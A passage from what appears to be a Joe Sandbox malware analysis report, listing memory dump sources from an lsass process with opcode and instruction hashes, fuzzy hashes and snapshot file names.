                                        • Opcode Fuzzy Hash: 008fb3e3c86ae656f875ee9a84c7b9f44b7fa2b4bc75c7723e07fac6ec0e5dc8
                                        • Instruction Fuzzy Hash: C6218E31E1994ECFDF98DB98C8A09ECB7B5FF58700F50017AD01AE32A2DA296D45CB00
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cf2282ee47e3a34b4ef2f14a3f04e102de71464ecaf7b447a6e78bbe1f9e987e
                                        • Instruction ID: 2c74b085cfa0a8610d4644fa060895fc06541fec8c440e2540eec03f4cce9b1b
                                        • Opcode Fuzzy Hash: cf2282ee47e3a34b4ef2f14a3f04e102de71464ecaf7b447a6e78bbe1f9e987e
                                        • Instruction Fuzzy Hash: E2117821F0E78D4FDB7991E448652F937E5EF5B340F05017AE049E70A3DC5A290A8351
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9b449622db5612ae5e5dbd9d50625730a5b8c7d295be9332527f17fa19199069
                                        • Instruction ID: 3dbb8fce42a4807459ac888c9bb88479173dbd399379342811fa00aecc541bc3
                                        • Opcode Fuzzy Hash: 9b449622db5612ae5e5dbd9d50625730a5b8c7d295be9332527f17fa19199069
                                        • Instruction Fuzzy Hash: 5A21F330709A0A5FE799EB58D0646B5B3A1FF54314F11823AC40EC2BEADF79E9558BC0
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 60807da3f3de170f47d571a338e5b7b0f8829ed1d5bf1775970a9f6d8918fe60
                                        • Instruction ID: 50751b0a873cd89e9a9ed446945731aaaf32aa0eae797cc64b12d0f3a234c098
                                        • Opcode Fuzzy Hash: 60807da3f3de170f47d571a338e5b7b0f8829ed1d5bf1775970a9f6d8918fe60
                                        • Instruction Fuzzy Hash: 1D112010B2E86F47F63CD65448749B47775EF64301719467DC45BCB4EAC82DBAC89381
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4ce1a327c1ed8bbb69cb2402a0d2f3dbf5d80f609b35e16aae49d3bb4ea5eae8
                                        • Instruction ID: 550cbdcd8980f2683407528fcc2d298879581a6ae7e851103a85db304cb03a1e
                                        • Opcode Fuzzy Hash: 4ce1a327c1ed8bbb69cb2402a0d2f3dbf5d80f609b35e16aae49d3bb4ea5eae8
                                        • Instruction Fuzzy Hash: 1211E921B0990D4BE758FB7888A5B7572D5EF9C314F01827AE41EC72E6CE2D68488340
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9bab0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 968e54f83fad1db97bb844dadc8a545acbd0d10948fae0e08e510630d3eee526
                                        • Instruction ID: d39d5cbeab922206ab77de4cbbb2048335d6469cf6201e4b5da865c1fad0fc1a
                                        • Opcode Fuzzy Hash: 968e54f83fad1db97bb844dadc8a545acbd0d10948fae0e08e510630d3eee526
                                        • Instruction Fuzzy Hash: C8116071F0851F8BEB64EB98C8256BD77A1EF54314F10063ED029C72E5DFB86A418A81
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 585011ca9e5b3083aaae3c1fb4e9b71dfdb6fde84943405d5deb15928806df1d
                                        • Instruction ID: f8459353b2f853158c0f66784987d2b5f305d3b060a9a6a12f596c5e13bf3b3f
                                        • Opcode Fuzzy Hash: 585011ca9e5b3083aaae3c1fb4e9b71dfdb6fde84943405d5deb15928806df1d
                                        • Instruction Fuzzy Hash: 56119420F0A90E4FEBB4EB9888746B876E3EF58711F1142B6C40DD32B1DD68AE448B50
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d28d277057d36eb67845eec8069c46d6d99253bb9a672f197332ccbdb199aa34
                                        • Instruction ID: e3ca8fa6d0921ed3253570a76162bdd21165d4e4faa083d7e74e2c3e33cd49aa
                                        • Opcode Fuzzy Hash: d28d277057d36eb67845eec8069c46d6d99253bb9a672f197332ccbdb199aa34
                                        • Instruction Fuzzy Hash: 0011C635B0E68D8FE731DFA8886519C7FB1EF42711F0645F7C088DB1A2D574164987A4
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d74ff2ac68520297766aebd76c539baaeb4616e3f3400d4c5e9856050276b83a
                                        • Instruction ID: b71f8ace2130d50f02003c48b55ce76a46cae34193d0b04b800f25f3614c18d6
                                        • Opcode Fuzzy Hash: d74ff2ac68520297766aebd76c539baaeb4616e3f3400d4c5e9856050276b83a
                                        • Instruction Fuzzy Hash: C601843070A60E8BE7389B54C4A17793795FF94344F52027AC05A972B3DE3DBA498785
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a1210c6f149a47f69fc02331fd5050f2dfcaf026f31ca9fd447148f2ccc0831b
                                        • Instruction ID: 360ea816e2c7504f28c4fdf7306e062410b670ba00d8739fdd3db69be8d41542
                                        • Opcode Fuzzy Hash: a1210c6f149a47f69fc02331fd5050f2dfcaf026f31ca9fd447148f2ccc0831b
                                        • Instruction Fuzzy Hash: A0010435B0E38C8FE722DFA8886419CBFB1EF42710F0645F7C088CB1A2D97426498764
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fa0e1f1c802e6ea1b851d76c5de6500163d2ec3a0510baad5e974e278c5064ea
                                        • Instruction ID: 3d460acee9209248ae545de61fdc40cd5322b73e5cc6aa623cf21a23a3c7f7c9
                                        • Opcode Fuzzy Hash: fa0e1f1c802e6ea1b851d76c5de6500163d2ec3a0510baad5e974e278c5064ea
                                        • Instruction Fuzzy Hash: CA11C37190496C8FDBA4DF04C894B9D77B1EB58301F1585AED40EE72A0CE75AE84CF85
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 29452f3b04c217cb28f3bb0257b9810f4b6373964789715b0b6b9bfcfffbdeaa
                                        • Instruction ID: 1598829738570b37f454fb072199bc0e8a7aed94e8c33e5b243901e0e69abe4a
                                        • Opcode Fuzzy Hash: 29452f3b04c217cb28f3bb0257b9810f4b6373964789715b0b6b9bfcfffbdeaa
                                        • Instruction Fuzzy Hash: 2D017530B09A0E8BE339EB44D4657B532D5FB94304F11467DD84FC22E2DF3DA98A8689
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d12f4620f475cc0f2373907d8cfd15450661b6f595f34a5d627a98fd5cbfabb7
                                        • Instruction ID: 0842613c28fa6246b685083414a53d6f204e5d264d6e372224b1afbf9384dd7f
                                        • Opcode Fuzzy Hash: d12f4620f475cc0f2373907d8cfd15450661b6f595f34a5d627a98fd5cbfabb7
                                        • Instruction Fuzzy Hash: B5019235A0E38D9FD721DFA4885419CBFB1EF42710F1641E7D088DB1A2D9746645C754
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d2c4b260a0a690bf632b716d096113f5a97900bbc27a798199006ecc31e60521
                                        • Instruction ID: abd6f4d777beedcc9603ba3278557e4bd0c9f7583ff56d54412a5a7f03d916ba
                                        • Opcode Fuzzy Hash: d2c4b260a0a690bf632b716d096113f5a97900bbc27a798199006ecc31e60521
                                        • Instruction Fuzzy Hash: 0501D130A0970D8BD734DF54C4917A933A0FFA4310F11027AC046972A3CB3AA945CBC0
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 98a50abead63831e7fec01418b48ab593748453b7c04d48aca80e5bbcc60c36e
                                        • Instruction ID: 7651de96b485b5a6a0222738d6905f769e62ecf6a9dccb6e0068e3e208255415
                                        • Opcode Fuzzy Hash: 98a50abead63831e7fec01418b48ab593748453b7c04d48aca80e5bbcc60c36e
                                        • Instruction Fuzzy Hash: F601AC3134E24A8FC716CBA8D4A56E9BBA0EF52324F2842BED845C71E2CA5A5614C780
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 015c0c172b243d6839e97c087b72de9b85d62d94a4c3b5f573446f096a2da7fb
                                        • Instruction ID: 5da689b14c541d2f5f459769abee1ea138929c4fc4d99b907fdc2036e211ef1f
                                        • Opcode Fuzzy Hash: 015c0c172b243d6839e97c087b72de9b85d62d94a4c3b5f573446f096a2da7fb
                                        • Instruction Fuzzy Hash: D3F0963154F3C9AFD7268BB088255E93FB8EF43254B1A00F6D495CB0B2C56D5B4AC762
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1aedc15860473d66294bcd7d30928d416fab4d432e3251ec394bf809f57ce886
                                        • Instruction ID: 2b5f8539aa83c294907a52e2e8c51086a76859ff4927a3d2ed4f1cf29778dfe4
                                        • Opcode Fuzzy Hash: 1aedc15860473d66294bcd7d30928d416fab4d432e3251ec394bf809f57ce886
                                        • Instruction Fuzzy Hash: B701BC34A0E38D9FE721DBA488A419CBFB1AF02700F1541E7C088CB1A2D9782A448754
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9bac3000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 72e8d9ce8939ada8daf97852702da57a1e0221aec448b458bae29d5719783844
                                        • Instruction ID: 4c7eb7cd99421f110bd073594e3329c82d544306a91dd9317140f595db3c4a04
                                        • Opcode Fuzzy Hash: 72e8d9ce8939ada8daf97852702da57a1e0221aec448b458bae29d5719783844
                                        • Instruction Fuzzy Hash: DCF0FF30B0981D8BF769F748C8A57B83392EB98320F024179D40EC72E2DE6C6E418780
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 01e6a530534f018d3b2ee66dd8af7d64d4247341198ed03ea6f2d9d0b6add2d2
                                        • Instruction ID: a652f649263d053454e2d5d0a71f3f28001c328d825d105400285af0b1bac241
                                        • Opcode Fuzzy Hash: 01e6a530534f018d3b2ee66dd8af7d64d4247341198ed03ea6f2d9d0b6add2d2
                                        • Instruction Fuzzy Hash: 66F0E521B0DF880FC76A566D4869061BFF1DF6A51134A43EFC045CB6B3ED59AC89C342
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4eb1ffb5accd51ad36bdc4814720d1f5197c5ab215985cd5784c1b037849105d
                                        • Instruction ID: 0a2fa89e7e0d5747494ddef0842e7392d38e43ee3c4e0df416cc6856fdda74ef
                                        • Opcode Fuzzy Hash: 4eb1ffb5accd51ad36bdc4814720d1f5197c5ab215985cd5784c1b037849105d
                                        • Instruction Fuzzy Hash: D7F0E630B0A91E8AEBB4DB54CC547B873A2EF54311F1141B6C40ED31B1DEB86EC58B54
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9bab0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7a72897bfa2d5ed790c4da001a0ba0107c464fbca613f003c8cc343423831275
                                        • Instruction ID: 14dfd54124fb23c1bfc045ebbd9f176678ed5627f88e118182b41b1c667b7e1f
                                        • Opcode Fuzzy Hash: 7a72897bfa2d5ed790c4da001a0ba0107c464fbca613f003c8cc343423831275
                                        • Instruction Fuzzy Hash: F1F0B430B0D52E4BFB649B88A8606B93290FF01310F1245BCD45EC31F7DD78AA414B84
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 09bed51a84c8659b2e94871270fad55b8b9426c8566189d6f2baa9fe026836bc
                                        • Instruction ID: 5a485b8274835d9c3335894b93f793446f39198f4132d1a56ab01eaaa1494254
                                        • Opcode Fuzzy Hash: 09bed51a84c8659b2e94871270fad55b8b9426c8566189d6f2baa9fe026836bc
                                        • Instruction Fuzzy Hash: 49F0553560DA4ACFDB40AB38ECA18D0BB60EB46208B5611EAC088C70A3E250195CC700
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 83e203b8e896b3d77ad03fe1b179139441bbce6615a2dd4495b200fa47d7f963
                                        • Instruction ID: 79df24b6327bd82756927ca7257cf5cc40a6714b3b601b890e14c2101ab5199b
                                        • Opcode Fuzzy Hash: 83e203b8e896b3d77ad03fe1b179139441bbce6615a2dd4495b200fa47d7f963
                                        • Instruction Fuzzy Hash: 5FF09021A0E38A4FEF765AF44CA15B83BD0EF2734071A47FAC489DB1E7D56876098721
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9bac3000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a47b6b63f38ab02bf2acb23ffa2af692cf7bb9b26995557b301c6c61529f5627
                                        • Instruction ID: e9657ef71deb6a571a23848cafe0b9fd4689874064f2e25657937268aa92f06e
                                        • Opcode Fuzzy Hash: a47b6b63f38ab02bf2acb23ffa2af692cf7bb9b26995557b301c6c61529f5627
                                        • Instruction Fuzzy Hash: EDF0306155E7C40FD312AB388C255547FA0EA1720535B05EBC0C9CB4B3D94A485AC702
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6b2a8bba450a9726d66d1234c38823b011464835f4cac18be1516857b738b910
                                        • Instruction ID: f377eb49a8a20e5c4cc2d44dd1f13493591738e5b831be51da5b74f6d30ac8fe
                                        • Opcode Fuzzy Hash: 6b2a8bba450a9726d66d1234c38823b011464835f4cac18be1516857b738b910
                                        • Instruction Fuzzy Hash: 83E0D820709B884FC70E56388C695507FB1EB6710238A02DBD005CB2A3ED19DCC9C741
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 620c400f58104c25ee72f0295a701db363e685c0fd8beffa55c38e5a76923487
                                        • Instruction ID: 94a44058782c04311fa8ec512bb0c1704cef5a4e1f9f533843700eb2b5e94c0a
                                        • Opcode Fuzzy Hash: 620c400f58104c25ee72f0295a701db363e685c0fd8beffa55c38e5a76923487
                                        • Instruction Fuzzy Hash: 55F05420B0A50E4AEBB4DB84C8A46B97393EF54311F114176C40ED71F2CE696E458A50
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9bab0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0de9ab2d1e1d3ba4a9ad91d39114f45ac3c7a91d9e7c9e7e595d5d05dc638dd9
                                        • Instruction ID: a0f0d90a2913f9d276332e5d6a767ba9a5c17e2b208e17fabeaa07f7c8cefb6e
                                        • Opcode Fuzzy Hash: 0de9ab2d1e1d3ba4a9ad91d39114f45ac3c7a91d9e7c9e7e595d5d05dc638dd9
                                        • Instruction Fuzzy Hash: BBE06D31E1E52D8AEB74A784D8706F8B321EF44321F6100B6C41EA7591DAAA3A828E40
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9bab0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8ce8756cb5db0def1e10c7de3dda3c5f6772232c460d81b9dd9c9dff72e4d0ec
                                        • Instruction ID: 4ae678700cc8e8fd13ed504ed9a815ad3245d0119d431339418e2a7ee954e226
                                        • Opcode Fuzzy Hash: 8ce8756cb5db0def1e10c7de3dda3c5f6772232c460d81b9dd9c9dff72e4d0ec
                                        • Instruction Fuzzy Hash: 68F08220F1F52E46F6B4679488343B87252AF00310F5602B6D42D961E3DE9D3E808E01
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3b7aa61fd468428829799d00443e93c2baae9e3b281f0f70c77712afb74089e0
                                        • Instruction ID: 923dda69e58bf11382a5eb1bff07c12877da131f6a31a7f4c66a23754f2b3916
                                        • Opcode Fuzzy Hash: 3b7aa61fd468428829799d00443e93c2baae9e3b281f0f70c77712afb74089e0
                                        • Instruction Fuzzy Hash: F7E08611F1D50907F67856FCA4392B56383EB88B10F124175E44EC33E2ECBC69430155
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c4b8c8cb5007268f78eaa466d14c96a68735b97058f301e4e398b59e125c1059
                                        • Instruction ID: e6345f37c77d078c8dff598482f6ca69cc302ba28a0d1fc8aa3ae9b7608c4101
                                        • Opcode Fuzzy Hash: c4b8c8cb5007268f78eaa466d14c96a68735b97058f301e4e398b59e125c1059
                                        • Instruction Fuzzy Hash: 68E09231B0851A8BF7299744C8B07B873A6EB94300F1641BCD94FD36F1DDB8AE018699
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3aa00d790216fd91a99a5a63446b1a8fe34be649959d813ccd1bdce3c028203d
                                        • Instruction ID: 46d414f990e5fe325397922df83b8824c2b09586744d3d355c030d171a7074e1
                                        • Opcode Fuzzy Hash: 3aa00d790216fd91a99a5a63446b1a8fe34be649959d813ccd1bdce3c028203d
                                        • Instruction Fuzzy Hash: 51E04F20B0EA0E87E6306B8484B06B8324ADB94351F110335C40A862F3CD6D766902C0
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1bbe65a9f8a1dde05c526dd67553ccd80477e366b836c4d35e7b26fdeb78be67
                                        • Instruction ID: 680cbb86b3fbd15af342b029d0c556d9495ebc246fbe4bcaa31072f24ca6b707
                                        • Opcode Fuzzy Hash: 1bbe65a9f8a1dde05c526dd67553ccd80477e366b836c4d35e7b26fdeb78be67
                                        • Instruction Fuzzy Hash: D3D0A730B0DA0E87E330A740C4E49F93355D790351F114335C006862F6CD7DB66446C4
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bc12b17141c62a5e7bf2f6d95bec8da8d12e48d0a23b650481b9dd49e2b4399d
                                        • Instruction ID: 188f07be771cfbdd23715cdda7aa701b4aaa7cabf879f7eb9af9b68046b52bd6
                                        • Opcode Fuzzy Hash: bc12b17141c62a5e7bf2f6d95bec8da8d12e48d0a23b650481b9dd49e2b4399d
                                        • Instruction Fuzzy Hash: F6C08011E6FA4911D65457750CB241034C15B4E304BC701E8D54C802E1EC8D15558145
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 01e38e70d1fa6bb65dd097346d22abdbea730342f4aa22208da91687ed01f3b5
                                        • Instruction ID: 9a2e969648b5b8e455ef805bf44c71f79e16c2b759d97fefd7bf251fb2ed1667
                                        • Opcode Fuzzy Hash: 01e38e70d1fa6bb65dd097346d22abdbea730342f4aa22208da91687ed01f3b5
                                        • Instruction Fuzzy Hash: 65C00205F5B51E01E53573EA54660BDA2425BD5E54FD70172D50C800A198DD22D9026A
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6f60e8a32dc7cd82cdab9b8126faffc729a7f5ee650283cebf0420754674fa9f
                                        • Instruction ID: ce06c023ad015b5703b7c244815dbfcd98b5df33d04e39c89c9765c82061c9b2
                                        • Opcode Fuzzy Hash: 6f60e8a32dc7cd82cdab9b8126faffc729a7f5ee650283cebf0420754674fa9f
                                        • Instruction Fuzzy Hash: 68D0C914B1F65F85F23B4AC1407423E51A85F45700E23413EC09F419F1CD1F7B096601
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3c07fcd751d40f9919b02ea0cd9645cc1693f3bb19da6422d826d1c49477c6e3
                                        • Instruction ID: 1a35050766e590f1307e54011fcb85caf187bb49c43eeddd83dd8bc5d87a3cba
                                        • Opcode Fuzzy Hash: 3c07fcd751d40f9919b02ea0cd9645cc1693f3bb19da6422d826d1c49477c6e3
                                        • Instruction Fuzzy Hash: FCC08C00F0881A13F25A330C042163D00438F8471CFD54074E82FC63CECE0C1A0102C6
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
